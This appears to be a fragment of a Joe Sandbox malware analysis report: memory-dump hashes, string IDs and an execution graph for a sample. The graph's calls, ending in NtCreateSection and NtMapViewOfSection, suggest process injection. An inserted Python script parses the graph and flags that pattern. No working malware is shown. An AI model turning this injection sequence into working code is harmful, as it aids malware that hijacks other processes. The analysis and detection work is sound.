                    • Instruction Fuzzy Hash: 3ED109B6901706ABDB14DFA4CD84FEFB7B9BF48304F05451DE109EA240EB79AA11CB61
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: #$+$B$O$_$f$g$x
                    • API String ID: 0-4085954075
                    • Opcode ID: 019f54e6892b35cea75aec42b9ee1b1b12f5334d454093a1b1f8d1632532abf1
                    • Instruction ID: 016a1755136b56eb066b2206373a7382ca65edb87646eae31612b4155948e223
                    • Opcode Fuzzy Hash: 019f54e6892b35cea75aec42b9ee1b1b12f5334d454093a1b1f8d1632532abf1
                    • Instruction Fuzzy Hash: CF11BE10D0C7CAD9DB12D7BD84182AEBF715F23228F0882D9D8E56B2D2C2794756C7A6
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: L$S$\$a$c$e$l
                    • API String ID: 0-3322591375
                    • Opcode ID: 01313ca10768265efefad55ee4f7f91398995eb2dd8e4603dd55faf2ba84bff1
                    • Instruction ID: f387a1897367e4e19fe3823477e46165f693bfd9f8fd0687328d29754290fd4f
                    • Opcode Fuzzy Hash: 01313ca10768265efefad55ee4f7f91398995eb2dd8e4603dd55faf2ba84bff1
                    • Instruction Fuzzy Hash: C3418772C10218AADF20DFA8DC88ADEB7B8FF48714F06815AD90DEB100E77156858BD5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: F$P$T$f$r$x
                    • API String ID: 0-2523166886
                    • Opcode ID: af589b64bcf28765a537ef060956213029c6ee2e281201b51963866dd6805c20
                    • Instruction ID: bcc5beea7acafd8f40351118db9cea863f34eecc2fd9316ff9266b82d1d5c53d
                    • Opcode Fuzzy Hash: af589b64bcf28765a537ef060956213029c6ee2e281201b51963866dd6805c20
                    • Instruction Fuzzy Hash: 94512571900701AAEB34DF68CC48BEAF3FCAF04324F06456BE509DE180E7B4A694CB91
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $i$l$o$u
                    • API String ID: 0-2051669658
                    • Opcode ID: 1ad05f86f09832479eac1dad693b9fb1a695d64661f377db71a9d34b38c205d5
                    • Instruction ID: 21042ebaaeec5e658262fecfa681ec45ef73c898db25d4d71ce6acf0d36da56f
                    • Opcode Fuzzy Hash: 1ad05f86f09832479eac1dad693b9fb1a695d64661f377db71a9d34b38c205d5
                    • Instruction Fuzzy Hash: 79618EB5900304AFDB20DBA4CC84FEFB7FCAB48714F154559E55AEB280E735AB418B60
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $e$k$o
                    • API String ID: 0-3624523832
                    • Opcode ID: 42312bb7b87d06fad95ba8cef6e2bea7aa0a71caa450060eb251d04dbbe14719
                    • Instruction ID: 6ed54259929128bce2118c417e6df86e1978b5207690d0ae2b7bcd6da5af05f9
                    • Opcode Fuzzy Hash: 42312bb7b87d06fad95ba8cef6e2bea7aa0a71caa450060eb251d04dbbe14719
                    • Instruction Fuzzy Hash: E7B12BB5A00704AFDB25CBA4CC84FEFB7BDAF89700F148559E619EB240DA75AB41CB50
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $e$h$o
                    • API String ID: 0-3662636641
                    • Opcode ID: 2c0658d9e3e86cae48040e8b82df610831eac11c1366891266cc59199588b788
                    • Instruction ID: 3cc306e7ded34f933990a57e36810b15fc173c58e12d5f846b6cca708c2c8c92
                    • Opcode Fuzzy Hash: 2c0658d9e3e86cae48040e8b82df610831eac11c1366891266cc59199588b788
                    • Instruction Fuzzy Hash: 287142B69002197EDF64EB54CC84FEF737CAF45704F05429AB549DA040EF7457849BA2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $e$k$o
                    • API String ID: 0-3624523832
                    • Opcode ID: a6ea1d63f6d5c1ac9407f670987b73d93b1314fcc34a2f9e6f895c9f07bc2ee8
                    • Instruction ID: 8620e6b7c8e553dcb3f56c8af42cb63789bee649a85893c0562eacfde6ad0479
                    • Opcode Fuzzy Hash: a6ea1d63f6d5c1ac9407f670987b73d93b1314fcc34a2f9e6f895c9f07bc2ee8
                    • Instruction Fuzzy Hash: EE612DB5A00704AFDB64DFA4CD88FEFB7BDAF89700F148559A619DB280D731AA41CB50
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                    • API String ID: 0-2877786613
                    • Opcode ID: b46b18d91c3611367e98cf093f7de8b89bbe42c0a9d6feeeb6ea08bd1c49b40f
                    • Instruction ID: c3b2ff95636ec1a956a4f6cd48f15b1f90967ce347ac90d9710d4c10c90e564c
                    • Opcode Fuzzy Hash: b46b18d91c3611367e98cf093f7de8b89bbe42c0a9d6feeeb6ea08bd1c49b40f
                    • Instruction Fuzzy Hash: 4D317C75901A197BEB11EB958D42FEF773CAF46604F064058FA00EE180EB746A1687E6
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: G$b$c$h
                    • API String ID: 0-3025121880
                    • Opcode ID: 1d94a62005e067a659b0c8c3d71c8d80de8f95a2d1b7edbd00f785c5cbcba92c
                    • Instruction ID: ee559bfd5174a102c6556ebb98bc9cb2ed9ad506bde48e885c2ebb997bb604ae
                    • Opcode Fuzzy Hash: 1d94a62005e067a659b0c8c3d71c8d80de8f95a2d1b7edbd00f785c5cbcba92c
                    • Instruction Fuzzy Hash: C33187B5E10209BBEF14DB98CD45FEE77B8EF04308F058159E904EB240E7769A4487E5

                    Execution Graph

                    Execution Coverage: 0.9%
                    Dynamic/Decrypted Code Coverage: 100%
                    Signature Coverage: 0%
                    Total number of Nodes: 84
                    Total number of Limit Nodes: 6
                    execution_graph (flattened export of the interactive graph; internal node numbers dropped, addresses, edges and API names kept; "a -> b / c" means a has successors b and c)
                    • Root 4468785: 4468785 -> 4402bf0 LdrInitializeThunk -> 44687cd -> 446885f / 4400634 (12 API calls, 2 library calls); 446885f -> 446887f / 4402c70 LdrInitializeThunk -> 446887f; 446887f -> 446888a / 44802f4 LdrInitializeThunk __except_handler4 -> 446888a; 4400634 -> 44687fb __except_handler4 -> 4468844 / 448024e LdrInitializeThunk __except_handler4 -> 446889e; 446889e -> 4468844 / 4402fb0 LdrInitializeThunk -> 44688b0 __except_handler4; 44688b0 -> 44688cf / 4468844 / 44802f4 LdrInitializeThunk __except_handler4 -> 44688cf; 44688cf -> 4402b60 LdrInitializeThunk -> 44688d7 -> 4402e80 LdrInitializeThunk -> 4468844; 4468844 -> 446885f / 4402b60 LdrInitializeThunk -> 446885f
                    • 4402ad0 LdrInitializeThunk (no edges)
                    • Root 44454f0: 44454f0 -> 444553e -> 4445548 / 4402bf0 LdrInitializeThunk -> 444558d; 444558d -> 4445596 __except_handler4 / 4402c00 -> 4402c0a -> 4402c11 / 4402c1f LdrInitializeThunk; 444562d -> 4445960 (566 API calls) -> 4445596; 4445596 -> 44456d2 / 4402d30 LdrInitializeThunk -> 44456d2; 44456d2 -> 44458df / 4402d30 LdrInitializeThunk -> 44458df; 44458df -> 44458ef / 4402b60 LdrInitializeThunk -> 44458ef; 44458ef -> 444590c / 4402c70 LdrInitializeThunk -> 444590c; 444590c -> 444591c / 4402b60 LdrInitializeThunk -> 444591c; 444591c -> 444592c / 4402b60 LdrInitializeThunk -> 444592c; 444592c -> 4445548 / 4402b60 LdrInitializeThunk -> 4445548
                    • Root 44455b6 (joins the 44454f0 component): 44455b6 -> 4402c70 __except_handler4 LdrInitializeThunk -> 44455d4 -> 4402bf0 __except_handler4 LdrInitializeThunk -> 44455f6; 44455f6 -> 4445674 / 444562d / 4445596; 4445674 -> 4402f30 __except_handler4 LdrInitializeThunk -> 444569c; 444569c -> 4445596 / 4402d10 __except_handler4 LdrInitializeThunk -> 44456cc; 44456cc -> 44456d2 / 4402d10 __except_handler4 LdrInitializeThunk -> 44456fe __except_handler4; 44456fe -> 4445596 / 4400634 (12 API calls) -> 4445596
                    • Root 410f1a5: 410f1a5 -> 410f200 -> 410f234 / 410c3c8; 410c3c8 -> 410c3ed -> 410c5dd / 410c56a NtQueryInformationProcess -> 410c5a4; 410c5a4 -> 410c5dd / 410c67b NtReadVirtualMemory / 410c6bd; 410c67b -> 410f308 -> 410f37d -> 410f392 / 410cda8 NtCreateSection NtMapViewOfSection -> 410f392; 410f392 -> 410c5dd; 410c6bd -> 410c5dd / 410f248 -> 410f2b5; 410f2b5 -> 410f2c7 / 410ca08 -> 410ca35; 410ca35 -> 410cb05 / 410cb3f NtCreateSection -> 410cb05; 410cb05 -> 410cba7 / 410cbed NtMapViewOfSection -> 410cba7; 410cba7 -> 410f2c7 -> 410c5dd; 410c5dd -> 410f211
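                    The execution_graph text above is only useful once it is rebuilt into nodes and edges. The Python below is an added example for this report, not code from Joe Sandbox: it parses a dump in this flattened form, finds the root functions, lists the Nt*/Ldr* calls each root can reach, and flags the combination that the 410f1a5 root shows (NtQueryInformationProcess and NtReadVirtualMemory followed by NtCreateSection and NtMapViewOfSection, the section-mapping shape behind a "maps a memory area into another process" finding). The embedded sample is an excerpt copied from this report's graph text; the token grammar (decimal node id followed by a hex address, "a->b" edges, everything else an annotation on the preceding node) and the API-name pattern are assumptions inferred from the dump, not a documented Joe Sandbox format.

```python
"""Rebuild a flattened Joe Sandbox execution_graph dump into a call graph.

Added example for this report; not code from Joe Sandbox.  The token grammar
is inferred from the dump itself (an assumption, not a documented format):
a node is "<decimal id> <hex address> [annotations...]", an edge is
"<id>-><id>", and every other token annotates the most recent node.
"""
import re
from collections import defaultdict

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]{6,8}$", re.IGNORECASE)
# Assumption: native-API annotations start with Nt, Zw or Ldr.
API_RE = re.compile(r"^(?:Nt|Zw|Ldr)[A-Za-z]+$")

# Constructed sample: tokens copied from this report's execution_graph for
# three of its roots (4468785 cut after its first few nodes, 4402ad0 and
# 410f1a5 complete).
SAMPLE = (
    "execution_graph "
    "70649 4468785 70670 4402bf0 LdrInitializeThunk 70649->70670 70651 44687cd "
    "70671 4400634 12 API calls 2 library calls 70651->70671 70670->70651 "
    "70681 4402ad0 LdrInitializeThunk "
    "70734 410f1a5 70735 410f200 70734->70735 70736 410f234 70735->70736 "
    "70739 410c3c8 70735->70739 70738 410f211 70740 410c3ed 70739->70740 "
    "70741 410c56a NtQueryInformationProcess 70740->70741 70747 410c5dd "
    "70740->70747 70742 410c5a4 70741->70742 70743 410c67b NtReadVirtualMemory "
    "70742->70743 70745 410c6bd 70742->70745 70742->70747 70748 410f308 "
    "70743->70748 70745->70747 70752 410f248 70745->70752 70747->70738 "
    "70749 410f37d 70748->70749 70750 410f392 70749->70750 "
    "70756 410cda8 NtCreateSection NtMapViewOfSection 70749->70756 70750->70747 "
    "70753 410f2b5 70752->70753 70755 410f2c7 70753->70755 70757 410ca08 "
    "70753->70757 70755->70747 70756->70750 70758 410ca35 70757->70758 "
    "70759 410cb3f NtCreateSection 70758->70759 70760 410cb05 70758->70760 "
    "70759->70760 70761 410cbed NtMapViewOfSection 70760->70761 70762 410cba7 "
    "70760->70762 70761->70762 70762->70755"
)


def parse_execution_graph(text):
    """Return (nodes, edges): nodes[id] = {"addr": int, "labels": [...]},
    edges[id] = set of successor ids."""
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes, edges, current = {}, defaultdict(set), None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges[edge.group(1)].add(edge.group(2))
            current = None            # annotations never follow an edge
            i += 1
            continue
        # A node starts with a decimal id immediately followed by a hex address;
        # annotation counts such as "12 API calls" fail the address check.
        if tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = tok
            nodes[current] = {"addr": int(tokens[i + 1], 16), "labels": []}
            i += 2
            continue
        if current is not None:       # e.g. "LdrInitializeThunk", "__except_handler4"
            nodes[current]["labels"].append(tok)
        i += 1
    return nodes, edges


def roots(nodes, edges):
    """Node ids that nothing points at: the graph's entry functions."""
    targets = {dst for dsts in edges.values() for dst in dsts}
    return [n for n in nodes if n not in targets]


def reachable_apis(start, nodes, edges):
    """Depth-first walk collecting API-looking annotations reachable from start."""
    seen, stack, apis = set(), [start], set()
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        apis.update(l for l in nodes.get(n, {}).get("labels", []) if API_RE.match(l))
        stack.extend(edges.get(n, ()))
    return apis


def summarize(text):
    """Map each root's hex address to the sorted list of APIs it can reach."""
    nodes, edges = parse_execution_graph(text)
    return {format(nodes[r]["addr"], "x"): sorted(reachable_apis(r, nodes, edges))
            for r in roots(nodes, edges)}


# Heuristic: inspecting a remote process and then creating a section and
# mapping a view is the classic section-based injection shape.  The graph
# only proves the calls are reachable, not their arguments or target process.
SECTION_MAPPING = {"NtCreateSection", "NtMapViewOfSection"}
REMOTE_INSPECTION = {"NtQueryInformationProcess", "NtReadVirtualMemory"}


def looks_like_section_injection(apis):
    apis = set(apis)
    return SECTION_MAPPING <= apis and bool(apis & REMOTE_INSPECTION)


if __name__ == "__main__":
    for addr, apis in summarize(SAMPLE).items():
        flag = "  <-- section-mapping injection shape" if looks_like_section_injection(apis) else ""
        print(f"{addr}: {', '.join(apis) or '(no native APIs)'}{flag}")
```

                    Run against the full graph text, summarize() gives one line per root; roots whose reachable set is only LdrInitializeThunk (the 4468785 and 44454f0 components here) are wrappers and exception-handler plumbing, while the 410f1a5 root is the one worth opening in the control-flow graph.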

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034491190.0000000004100000.00000040.00000800.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4100000_clip.jbxd
                    Similarity
                    • API ID: CreateSection
                    • String ID: @$@$@$@
                    • API String ID: 2449625523-3310854385
                    • Opcode ID: d7afe012f486fccd5ae4cb68458048ee7dbb18ecec3a876717ec4a98f3e1979f
                    • Instruction ID: 7d4fa10b55245b7420be50f918a67706914fb31e6c185108e9233885d81cfcce
                    • Opcode Fuzzy Hash: d7afe012f486fccd5ae4cb68458048ee7dbb18ecec3a876717ec4a98f3e1979f
                    • Instruction Fuzzy Hash: EAB18270618B489FDB58DF68D4947AABBE0FF58704F50472EE49AD3290EB70E5018BC6

                    Control-flow Graph

                    APIs
                    • NtQueryInformationProcess.NTDLL ref: 0410C589
                    • NtReadVirtualMemory.NTDLL ref: 0410C696
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034491190.0000000004100000.00000040.00000800.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4100000_clip.jbxd
                    Similarity
                    • API ID: InformationMemoryProcessQueryReadVirtual
                    • String ID: 0
                    • API String ID: 1498878907-4108050209
                    • Opcode ID: f7013fddbefb5b035c0a082f9b56e4ce07a08035a184605eab8daacf8957dd83
                    • Instruction ID: a3680693a259e41023f0377b3c1ce4b6d843b2939661fc351a7a6192788653bb
                    • Opcode Fuzzy Hash: f7013fddbefb5b035c0a082f9b56e4ce07a08035a184605eab8daacf8957dd83
                    • Instruction Fuzzy Hash: F8022E70518A8C8FDFA9EF68D894AEE77E1FB98304F00462ED44ADB190DF74A641CB41
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 43ee7eaaf4be6e25a5d2e1faee4afbc6da2f514074cc06f84d516c54cf1d33d4
                    • Instruction ID: 6ad3de6f259a7f7a4bf3767bcf894796585b2bdeffebc2ef33e3a6ca89ed2796
                    • Opcode Fuzzy Hash: 43ee7eaaf4be6e25a5d2e1faee4afbc6da2f514074cc06f84d516c54cf1d33d4
                    • Instruction Fuzzy Hash: 4B90023164550403F5007158451470620058BE1245F65C413A0425569D8799DA5165A2
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 401486ffe3ed67b8ae4874dfcb29a3c007deb248c37d8e0c70fbe0cf868e3e8e
                    • Instruction ID: ed30c93c0cb3c3ae08430c3b3ff0f1b0a1043a91828f8e9f3b2a33f26744b090
                    • Opcode Fuzzy Hash: 401486ffe3ed67b8ae4874dfcb29a3c007deb248c37d8e0c70fbe0cf868e3e8e
                    • Instruction Fuzzy Hash: 0A9002716415004365407158480440670059BF2345395C117A0555561C871CD9559269
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: ba1dd54a7924bbe7bb2233f3fe7c0f8f1c17a8855879029cfc41f14876ef408a
                    • Instruction ID: a3d7ba9b474d50c9cba5368f8b6fbbdd4f331f4ceb71b824a98989dc33e16a67
                    • Opcode Fuzzy Hash: ba1dd54a7924bbe7bb2233f3fe7c0f8f1c17a8855879029cfc41f14876ef408a
                    • Instruction Fuzzy Hash: 8090023128140803F540715884147071006CBE1645F55C013A0025555D871ADA6566B1
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 888025bab0837d87b1d827b0a99dc78fdb40b653525d50ce8024277ce08ad10e
                    • Instruction ID: 89c3b2303f2cb517ddfb73b66c8daf98896566f4a888da1d8b697b939600e474
                    • Opcode Fuzzy Hash: 888025bab0837d87b1d827b0a99dc78fdb40b653525d50ce8024277ce08ad10e
                    • Instruction Fuzzy Hash: 0590023164580013B5407158488454650059BF1345B55C013E0425555C8B18DA565361

                    Control-flow Graph

                    control_flow_graph 268 4402c60-4402c6c LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 067cb95fa071b88f7e6ac7d1adb9f0b9b2e747aaa3eea4803d25973b9318995b
                    • Instruction ID: 702345d465801d5f3e7969f7eefccc64a7323722620f13ffa06a9fcf069e1b08
                    • Opcode Fuzzy Hash: 067cb95fa071b88f7e6ac7d1adb9f0b9b2e747aaa3eea4803d25973b9318995b
                    • Instruction Fuzzy Hash: D890023124140843F50071584404B4610058BF1345F55C017A0125655D8719D9517521

                    Control-flow Graph

                    control_flow_graph 269 4402c70-4402c7c LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 75087595f7c948d0cadba87878a68dedbc95482f5345d51a770b7b9183ecbf68
                    • Instruction ID: e10a939f7f26a76e33cf17c665864f20942635193caa452be6af56f63d173df5
                    • Opcode Fuzzy Hash: 75087595f7c948d0cadba87878a68dedbc95482f5345d51a770b7b9183ecbf68
                    • Instruction Fuzzy Hash: 5090023124148803F5107158840474A10058BE1345F59C413A4425659D8799D9917121

                    Control-flow Graph

                    control_flow_graph 270 4402ca0-4402cac LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 4223404c5d768b60aa07b7444f8512756bbb82e5bb1f81b4c014ceb2b93bc45b
                    • Instruction ID: 043d24ac4e9a789a5320714b934c9d8428611f8d3230bed6f6c6818214db2bfa
                    • Opcode Fuzzy Hash: 4223404c5d768b60aa07b7444f8512756bbb82e5bb1f81b4c014ceb2b93bc45b
                    • Instruction Fuzzy Hash: 0290023124140403F5007598540864610058BF1345F55D013A5025556EC769D9916131

                    Control-flow Graph

                    control_flow_graph 271 4402d10-4402d1c LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 3ad9b7d946fe28357cb42fee375cf8853ba05b274a0bb9b9feee75f4bf25c3ed
                    • Instruction ID: 3216f713d8116c45f3c5ebcb2a178deb94fb5ec2d86c0e98551ec1232c5db261
                    • Opcode Fuzzy Hash: 3ad9b7d946fe28357cb42fee375cf8853ba05b274a0bb9b9feee75f4bf25c3ed
                    • Instruction Fuzzy Hash: A990023925340003F5807158540860A10058BE2246F95D417A0016559CCB19D9695321

                    Control-flow Graph

                    control_flow_graph 272 4402d30-4402d3c LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 1b02840482ee2782fc5607d69299a8b3c783afbeffca4a3ed6d4971312d810fb
                    • Instruction ID: 8ba2c1957b02a42ec97f3f5278310ed0f24930d302490c279cc5a4112c5ca675
                    • Opcode Fuzzy Hash: 1b02840482ee2782fc5607d69299a8b3c783afbeffca4a3ed6d4971312d810fb
                    • Instruction Fuzzy Hash: B090023134140003F540715854186065005DBF2345F55D013E0415555CDB19D9565222
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: b3fca2a3fa502113b624b1fa250573c2f37e26767623612e88a013176a419973
                    • Instruction ID: c069d8141719cdbd5e3f17e9d1875836d0f5bbfe92de225e60f7d4ac5faeb4d6
                    • Opcode Fuzzy Hash: b3fca2a3fa502113b624b1fa250573c2f37e26767623612e88a013176a419973
                    • Instruction Fuzzy Hash: D3900231282441537945B158440450750069BF1285795C013A1415951C872AE956D621
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
